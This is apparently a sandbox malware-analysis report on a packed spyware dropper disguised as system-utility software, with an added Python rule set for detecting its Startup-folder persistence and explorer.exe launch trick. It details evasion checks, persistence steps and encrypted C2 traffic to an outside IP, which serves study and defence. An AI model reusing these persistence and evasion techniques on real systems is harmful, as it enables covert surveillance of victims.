Launches a second explorer.exe instance
Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown | Process created: C:\Windows\explorer.exe
Queries process information (via WMI, Win32_Process)
Source: C:\Users\user\Desktop\govrat.exe | String freed: SELECT * FROM Win32_Processor (4 occurrences)
Source: C:\Users\user\Desktop\govrat.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Reads ini files
Source: C:\Users\user\Desktop\govrat.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\govrat.exe | Key opened: HKEY_USERS\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\govrat.exe 'C:\Users\user\Desktop\govrat.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe'
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\govrat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3AD05575-8857-4850-9277-11B85BDB8E09}\InProcServer32
PE file has a valid certificate
Source: govrat.exe | Static PE information: certificate valid
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: govrat.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: wow64win.pdb | source: govrat.exe, explorer.exe, ASC.exe
Source: Binary string: wow64cpu.pdb | source: govrat.exe, explorer.exe, ASC.exe
Source: Binary string: wow64.pdbH | source: govrat.exe, explorer.exe, ASC.exe
Source: Binary string: wow64win.pdbH | source: govrat.exe, explorer.exe, ASC.exe
Source: Binary string: wow64.pdb | source: govrat.exe, explorer.exe, ASC.exe
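
Read together, the "Drops PE files" entry and the "Spawns processes" entries above describe one chain: govrat.exe writes ASC.exe into the user's Startup folder, then runs `explorer.exe <path to ASC.exe>`, so that ASC.exe's parent in the process tree is explorer.exe rather than the dropper. The Python below is an added example, not part of the Joe Sandbox report, that applies three rules to process and file events and correlates the drop with the later execution. The event list is constructed in Sysmon-style fields from the report's entries; PIDs other than 3676 and 3948, and the parent of the SysWOW64 explorer.exe (which the report lists as "unknown"), are assumptions.

```python
"""Flag the drop-to-Startup and explorer.exe launch-proxy chain from this report.

Added example, not part of the Joe Sandbox report. EVENTS is constructed in
Sysmon-style fields from the report's file and process entries; PIDs other
than 3676 and 3948 and the parent of the SysWOW64 explorer.exe (listed as
"unknown" in the report) are assumptions.
"""
import re

STARTUP_DIR = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
USER_WRITABLE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\")
AUTORUN_EXT = (".exe", ".dll", ".scr", ".lnk", ".bat", ".vbs", ".js")

ASC = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe"
GOVRAT = r"C:\Users\user\Desktop\govrat.exe"

EVENTS = [  # constructed from the report; see the module docstring for what is assumed
    {"type": "FileCreate", "pid": 3676, "image": GOVRAT, "target": ASC},
    {"type": "ProcessCreate", "pid": 3948, "parent_image": GOVRAT,
     "image": r"C:\Windows\SysWOW64\explorer.exe", "cmdline": "explorer.exe " + ASC},
    {"type": "ProcessCreate", "pid": 4012, "parent_image": "",
     "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding"},
    {"type": "ProcessCreate", "pid": 4100, "parent_image": r"C:\Windows\explorer.exe",
     "image": ASC, "cmdline": "'" + ASC + "'"},
]


def explorer_argument(cmdline: str) -> str:
    """Everything after the explorer.exe token, with surrounding quotes removed."""
    return cmdline.partition(" ")[2].strip().strip("'\"")


def detect(events):
    """Run the rules in event order and return (rule, pid, detail) tuples."""
    alerts = []
    dropped = {}  # lower-cased path -> pid of the process that wrote it
    for ev in events:
        if ev["type"] == "FileCreate":
            target = ev["target"]
            if STARTUP_DIR.search(target) and target.lower().endswith(AUTORUN_EXT):
                alerts.append(("startup_folder_drop", ev["pid"], target))
            dropped[target.lower()] = ev["pid"]
            continue
        image = ev["image"]
        if image.lower().endswith("\\explorer.exe"):
            # "explorer.exe <path>" runs <path> with explorer.exe as its parent,
            # which detaches the payload from the dropper in the process tree.
            arg = explorer_argument(ev["cmdline"])
            if arg and (STARTUP_DIR.search(arg) or USER_WRITABLE.match(arg)):
                alerts.append(("explorer_launch_proxy", ev["pid"], arg))
            parent = ev["parent_image"].lower()
            if parent and not parent.startswith("c:\\windows\\"):
                alerts.append(("explorer_spawned_by_user_binary", ev["pid"], ev["parent_image"]))
        if image.lower() in dropped:
            alerts.append(("dropped_then_executed", ev["pid"], image))
    return alerts
```

The `/factory,{...} -Embedding` explorer.exe instance is a normal DCOM activation and produces no alert, which is the false-positive case to keep in mind: the launch-proxy rule keys on the argument pointing into a user-writable path, not on explorer.exe being started at all.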

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: ASC.exe | Binary or memory string: Progman
Source: ASC.exe | Binary or memory string: Program Manager
Source: ASC.exe | Binary or memory string: Shell_TrayWnd

Anti Debugging:

Checks for debuggers (devices)
Source: C:\Windows\explorer.exe | File opened: C:\Windows\WinSxS\FileMaps\users_user_appdata_roaming_microsoft_windows_start_menu_programs_startup_1a6465368f7d89b6.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\govrat.exe | System information queried: KernelDebuggerInformation
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00982D1B rdtsc

Malware Analysis System Evasion:

Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Stalling execution: Execution stalls by calling Sleep (graph_5-20250)
Source: C:\Users\user\Desktop\govrat.exe | Stalling execution: Execution stalls by calling Sleep (graph_1-21009)
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00982D1B rdtsc
Contains functionality to enumerate device drivers
Source: C:\Users\user\Desktop\govrat.exe | Code function: GetProcAddress,GetProcAddress,GetProcAddress,K32EnumDeviceDrivers,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,__wcsicoll, 1_2_0095FE2E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: GetProcAddress,GetProcAddress,GetProcAddress,K32EnumDeviceDrivers,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,__wcsicoll, 5_2_012CFE2E
Enumerates the file system
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming
Is looking for software installed on the system
Source: C:\Users\user\Desktop\govrat.exe | Registry key enumerated: More than 124 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\explorer.exe TID: 1216 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3868 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3904 | Thread sleep time: -60000s >= -60000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\govrat.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00960762 GetProcAddress,GetProcAddress,FindFirstFileA,GetProcAddress
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D0762 GetProcAddress,GetProcAddress,FindFirstFileA,GetProcAddress
Program exit points
Source: C:\Users\user\Desktop\govrat.exe | API call chain: ExitProcess graph end node (graph_1-20536)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | API call chain: ExitProcess graph end node (graph_5-20089)
Queries a list of all running drivers
Source: C:\Users\user\Desktop\govrat.exe | System information queried: ModuleInformation

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00965B62 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\govrat.exe | Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (9 occurrences)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\govrat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Behavior Graph ID: 50649, Sample: govrat.exe, Startdate: 19/03/2018, Architecture: WINDOWS, Score: 56
  • Signatures on the sample: Sample is protected by VMProtect; Found stalling execution ending in API Sleep call
  • Processes started from the sample: govrat.exe, explorer.exe, explorer.exe; ASC.exe is started by explorer.exe
  • govrat.exe contacts 192.243.101.124 (local port 49177 to port 80), TIP-NETWORKS-INC-TIPNetworksIncUS, United States
  • govrat.exe drops C:\Users\user\AppData\Roaming\...\ASC.exe (PE32)
  • Signatures on govrat.exe: Detected Hacking Team Remote Control System (RCS) spyware; Found stalling execution ending in API Sleep call

Simulations

Behavior and APIs

Time | Type | Description
22:26:22 | API Interceptor | 43x Sleep call for process: govrat.exe modified
22:26:40 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe
22:26:41 | API Interceptor | 7x Sleep call for process: explorer.exe modified
22:26:47 | API Interceptor | 1x Sleep call for process: ASC.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Startup

  • System is w7x64native_hvm
  • govrat.exe (PID: 3676 cmdline: 'C:\Users\user\Desktop\govrat.exe' MD5: C0618556E9EF16B35B042BC29AEB9291)
  • explorer.exe (PID: 3948 cmdline: explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • explorer.exe (PID: 1212 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • ASC.exe (PID: 3812 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe' MD5: 882FAC6DFE6E15AEA53D177BE51B7E26)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe
Process:C:\Users\user\Desktop\govrat.exe
File Type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):6291472
Entropy (8bit):7.996353658269883
Encrypted:true
MD5:882FAC6DFE6E15AEA53D177BE51B7E26
SHA1:E8B5BF37D89A2921C0092353B0A7907FC00AF03D
SHA-256:2A9FFF46C9EFF07F2360F6E08216A7BCA793C09A64C36D8F80CD9F8E91A288A9
SHA-512:5B9FD1CBF214EA761EAA7929F105D97BB0172F8E4139511D2FB0E7109D2F375E1346A87C83C83193A88B34B02064C31D6EC1A14CE324701EDEE41190677686BE
Malicious:false
Reputation:low
\samr
Process:C:\Users\user\Desktop\govrat.exe
File Type:GLS_BINARY_LSB_FIRST
Size (bytes):1014
Entropy (8bit):4.131663370232929
Encrypted:false
MD5:D4D20EBCE40654F57B46AB722F3DBE83
SHA1:93DF2D6CF35698290269969BD1948C2108EB3AD2
SHA-256:C5D5D099BEF01A808BD9ECD517659ECD85A164280724603B0F6393A2AA3E1ED7
SHA-512:A6956754D60EC704B9CB862D34CD5E2EA860EE3CE9781F318A81B8F6D30A444CD60DE95675AE52474D5D1DDEFFA88C0E470341FC1683CDD723923ACCB69677F2
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

IP | Country | ASN | ASN Name | Malicious
192.243.101.124 | United States | 36454 | TIP-NETWORKS-INC-TIPNetworksIncUS | false

Static File Info

General

File type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):7.880515336004999
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:govrat.exe
File size:811992
MD5:c0618556e9ef16b35b042bc29aeb9291
SHA1:61eda4847845f49689ae582391cd1e6a216a8fa3
SHA256:d485eaaed66a97822fd8b3317d2d61df50c1e1647ad37d6f42805b11eac37746
SHA512:a69aa5bd6d38f19eeaed6e00b9e12eee05913d4e91f02373c46872cd5c3551d0dccec7607cc7d241001b0af8e4643aeef61632d9213060d0df60e44c9f3a8327
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m@.............k.......k.......k..................]....................k.......k.......k......Rich............PE..L....a.Y...

Static PE Info

General

Entrypoint:0x5642ba
Entrypoint Section:.vmp1
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x59DB618C [Mon Oct 09 11:46:20 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:370ca0394a7aeb5aeb72602950975e05

Authenticode Signature

Signature Valid:true
Signature Issuer:CN=thawte SHA256 Code Signing CA, O="thawte, Inc.", C=US
Signature Validation Error:The operation completed successfully
Error Number:0
Not Before, Not After
  • 09/07/2017 01:00:00 10/07/2018 00:59:59
Subject Chain
  • CN=Ziber Ltd, O=Ziber Ltd, L=London, S=London, C=GB
Version:3
Thumbprint:1456D8A00D8BE963E2224D845B12E5084EA0B707
Serial:5E15205F180442CC6C3C0F03E1A33D9F

Entrypoint Preview

Instruction
push 03595AFFh
call 0EC34A3Ch
mov byte ptr [eax+edi], dl
jmp 0EC357ACh
ret
and ebp, ecx
int3
rol dh, cl
pop esp
and ch, ah
xor eax, 8D77337Ah
shl byte ptr [ecx+27h], cl
pop esp
test dword ptr [edx+60AA2EDEh], edx
enter EB11h, E2h
cdq
les edi, fword ptr [ecx-7Ah]
dec edx
jnp 0ECC1520h
or dl, byte ptr [ebp-60h]
rol edi, 15h
jnl 0ECC14D5h
add edi, ebp
jc 159ACEF5h
loope 0ECC146Ah
cmp dword ptr [esi-71h], esp
leave
loopne 0ECC1476h
sbb dword ptr [eax-11h], ebx
mov fs, word ptr [esp-5Bh]
pop ecx
lds ebp, fword ptr [eax-14A609B6h]
aad B8h
and dword ptr [edx], esi
mov eax, 9D1DC735h
iretd
test dword ptr [ecx+2DE37F11h], A556B57Fh
and dword ptr [eax+eax*8], edx
jmp dword ptr [079B6DECh]
mov esi, dword ptr [58D39706h]
lea esp, dword ptr [ebp+4649E99Bh]
shl ebp, 1
stosd
xor dword ptr [eax], ebx
iretd
jnle 0ECC1499h
outsd
fmul dword ptr [esi-20ED2902h]
pop ss
sar dword ptr [edi+25h], 1
xchg bl, dl
sub dword ptr [edx], eax
push cs
cmpsb
in eax, dx
popfd
in al, dx
xchg byte ptr [edi], cl
sub dword ptr [ebp-56h], FFFFFFFFh
dec dword ptr [ebx+0800BFC7h]
add byte ptr [eax], al
cmp cl, bl
stc
sub edi, edx
shr edi, 05h
lea edi, dword ptr [edi+edx]
cmc

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x16b4cc | 0x4f | .vmp1
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x179eb0 | 0xdc | .vmp1
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x17c000 | 0x12eba | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xc5800 | 0xbd8 | .vmp0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x17b000 | 0x108 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x17a020 | 0x40 | .vmp1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x141000 | 0x94 | .vmp1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1ae10 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x1c000 | 0x5ddf | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x22000 | 0x4b3c | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.vmp0 | 0x27000 | 0xa0edc | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.vmp1 | 0xc8000 | 0xb2080 | 0xb2200 | False | 0.958959703947 | data | 7.94598915032 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.reloc | 0x17b000 | 0x108 | 0x200 | False | 0.39453125 | data | 2.46844131471 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x17c000 | 0x12eba | 0x13000 | False | 0.597810444079 | data | 6.54796071524 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x17c280 | 0x8768 | PNG image, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x1849e8 | 0x3a48 | data | English | United States
RT_ICON | 0x188430 | 0x25a8 | data | English | United States
RT_ICON | 0x18a9d8 | 0x1a68 | data | English | United States
RT_ICON | 0x18c440 | 0x10a8 | data | English | United States
RT_ICON | 0x18d4e8 | 0x988 | data | English | United States
RT_ICON | 0x18de70 | 0x6b8 | data | English | United States
RT_ICON | 0x18e528 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_GROUP_ICON | 0x18e990 | 0x76 | MS Windows icon resource - 8 icons, 256-colors | |
RT_VERSION | 0x18ea08 | 0x358 | data | |
RT_MANIFEST | 0x18ed60 | 0x15a | ASCII text, with CRLF line terminators | English | United States

Imports

DLL | Import
gdiplus.dll | GdipGetImageEncoders
GDI32.dll | DeleteDC
KERNEL32.dll | GlobalMemoryStatusEx
USER32.dll | GetMessageW
ADVAPI32.dll | CryptGenRandom
SHELL32.dll | Shell_NotifyIconW
ole32.dll | CoSetProxyBlanket
OLEAUT32.dll | SysFreeString
KERNEL32.dll | LocalAlloc, GetCurrentProcess, GetCurrentThread, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, GetLastError, FreeLibrary, LoadLibraryA, GetModuleHandleA
ADVAPI32.dll | OpenSCManagerW, EnumServicesStatusExW, OpenServiceW, QueryServiceConfigW, CloseServiceHandle

Exports

Name | Ordinal | Address
IsProcessParent | 1 | 0x40fa8a

Version Infos

Description | Data
LegalCopyright | Copyright(c) 2005-2016
FileVersion | 9.3.0.1121
CompanyName |
PrivateBuild | d5543e1965-81533df957-4f8b251e5d-84b718d211-42330f5c40-a942c47a31-fd2ba659a2-0bcec6dbdd-6f7c12de71-85bdf9
ProductName | Advanced SystemCare 9
ProductVersion | 9.3.0.1121
FileDescription | Advanced SystemCare 9
Translation | 0x0000 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mrz 19, 2018 22:26:56.784701109 MEZ | 49177 | 80 | 192.168.0.42 | 192.243.101.124
Mrz 19, 2018 22:26:56.784749985 MEZ | 80 | 49177 | 192.243.101.124 | 192.168.0.42
Mrz 19, 2018 22:26:56.785006046 MEZ | 49177 | 80 | 192.168.0.42 | 192.243.101.124
Mrz 19, 2018 22:26:56.787794113 MEZ | 49177 | 80 | 192.168.0.42 | 192.243.101.124
Mrz 19, 2018 22:26:56.787812948 MEZ | 80 | 49177 | 192.243.101.124 | 192.168.0.42
Mrz 19, 2018 22:26:56.788217068 MEZ | 49177 | 80 | 192.168.0.42 | 192.243.101.124
Mrz 19, 2018 22:26:56.788227081 MEZ | 80 | 49177 | 192.243.101.124 | 192.168.0.42
Mrz 19, 2018 22:26:58.239176989 MEZ | 80 | 49177 | 192.243.101.124 | 192.168.0.42
Mrz 19, 2018 22:26:58.286287069 MEZ | 49177 | 80 | 192.168.0.42 | 192.243.101.124
Mrz 19, 2018 22:26:58.286310911 MEZ | 80 | 49177 | 192.243.101.124 | 192.168.0.42
Mrz 19, 2018 22:26:58.286849022 MEZ | 49177 | 80 | 192.168.0.42 | 192.243.101.124
Mrz 19, 2018 22:26:58.286861897 MEZ | 80 | 49177 | 192.243.101.124 | 192.168.0.42
Mrz 19, 2018 22:26:59.300407887 MEZ | 80 | 49177 | 192.243.101.124 | 192.168.0.42
Mrz 19, 2018 22:26:59.300568104 MEZ | 49177 | 80 | 192.168.0.42 | 192.243.101.124
Mrz 19, 2018 22:26:59.300956011 MEZ | 49177 | 80 | 192.168.0.42 | 192.243.101.124
Mrz 19, 2018 22:26:59.300981998 MEZ | 80 | 49177 | 192.243.101.124 | 192.168.0.42

HTTP Request Dependency Graph

  • 192.243.101.124

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.0.42 | 49177 | 192.243.101.124 | 80 | C:\Users\user\Desktop\govrat.exe
Timestamp | kBytes transferred | Direction | Data
Mrz 19, 2018 22:26:56.787794113 MEZ | 7 | OUT | POST /index.html HTTP/1.1
Connection: Keep-Alive
Content-Type: application/octet-stream
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 440
Host: 192.243.101.124
Mrz 19, 2018 22:26:56.788217068 MEZ | 8 | OUT | Data Raw: 6e 70 67 57 58 6e 58 45 71 33 46 70 2b 47 63 75 61 76 6f 41 6f 77 30 65 6c 61 31 69 35 6a 6a 52 31 43 52 42 77 52 51 66 66 55 7a 2f 6d 69 50 6f 6e 44 6e 39 4a 66 36 6f 68 71 6d 6c 70 6c 2b 41 4f 36 67 61 67 30 45 57 5a 37 4f 6c 58 30 6f 70 37 75
Data Ascii: npgWXnXEq3Fp+GcuavoAow0ela1i5jjR1CRBwRQffUz/miPonDn9Jf6ohqmlpl+AO6gag0EWZ7OlX0op7umK8l/r8Aj/SACh65mvXTNjJS+QDwscjjtZ/sc3tT1MHOFoA48A4Vah8OEo9Nm8DSAGZrpU9Da6QanrYzNH7QmB4dVxKI0uiLO7fVVexYAtese0JhOwGc7RmTkcHFZnpoNLRRVfgYnWs/oAE1dB0+JWRAm8lGZNMLT
Mrz 19, 2018 22:26:58.239176989 MEZ | 9 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 19 Mar 2018 21:26:48 GMT
Content-Type: application/octet-stream
Content-Length: 304
Connection: keep-alive
Data Raw: 73 2f 45 76 54 58 55 70 31 46 37 42 77 42 31 46 70 51 50 37 46 47 44 31 32 55 6a 49 75 5a 49 71 34 6c 48 54 70 64 39 77 46 49 4b 30 35 6d 4b 2b 58 78 73 32 59 47 6f 64 43 4b 39 34 73 34 4a 54 36 55 66 51 2f 49 67 42 51 75 4f 36 71 55 48 58 6f 48 4e 58 57 30 47 6a 62 6f 61 58 4e 78 2f 48 4c 2b 47 4f 38 6b 42 77 59 73 37 6f 50 66 6f 6e 66 73 47 44 4d 53 64 42 5a 63 76 48 77 72 67 37 53 39 38 57 39 39 36 4d 31 2f 43 5a 31 2b 4f 63 68 4c 37 55 7a 6b 44 31 67 67 56 4a 32 68 32 52 44 33 41 6b 43 66 45 56 4b 31 2b 64 4c 49 53 57 33 47 57 34 45 39 77 6a 46 37 70 7a 54 55 44 75 75 2b 2b 46 38 4f 44 43 6e 2f 48 31 65 4c 4a 68 6b 4a 51 48 46 68 4a 30 71 79 49 69 59 48 63 4e 68 30 53 44 34 57 63 58 6a 48 63 58 6f 41 4d 59 67 63 71 45 68 6d 57 49 2b 67 39 4b 6b 62 70 36 79 6e 77 6c 53 77 44 76 71 63 36 42 76 61 72 6a 4c 59 4e 34 66 50 61 44 4c 56 76 66 37 4e 59 34 43 33 4e 41 6e 6c 4b 32 75 58 53 6c 6b 67 3d 3d
Data Ascii: s/EvTXUp1F7BwB1FpQP7FGD12UjIuZIq4lHTpd9wFIK05mK+Xxs2YGodCK94s4JT6UfQ/IgBQuO6qUHXoHNXW0GjboaXNx/HL+GO8kBwYs7oPfonfsGDMSdBZcvHwrg7S98W996M1/CZ1+OchL7UzkD1ggVJ2h2RD3AkCfEVK1+dLISW3GW4E9wjF7pzTUDuu++F8ODCn/H1eLJhkJQHFhJ0qyIiYHcNh0SD4WcXjHcXoAMYgcqEhmWI+g9Kkbp6ynwlSwDvqc6BvarjLYN4fPaDLVvf7NY4C3NAnlK2uXSlkg==
Mrz 19, 2018 22:26:58.286287069 MEZ | 9 | OUT | POST /index.html HTTP/1.1
Connection: Keep-Alive
Content-Type: application/octet-stream
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 32
Host: 192.243.101.124
Mrz 19, 2018 22:26:58.286849022 MEZ | 9 | OUT | Data Raw: d4 09 36 33 c9 4c 99 9f 57 7d e3 b2 c6 2c 8c a6 ca 30 39 7b 94 91 b1 4f fa 76 d5 f4 9b c5 f5 23
Data Ascii: 63LW},09{Ov#


System Behavior

General

Start time:22:26:18
Start date:10/10/2017
Path:C:\Users\user\Desktop\govrat.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\govrat.exe'
Imagebase:0x950000
File size:811992 bytes
MD5 hash:C0618556E9EF16B35B042BC29AEB9291
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:22:26:40
Start date:10/10/2017
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe
Imagebase:0x450000
File size:2972672 bytes
MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:22:26:41
Start date:10/10/2017
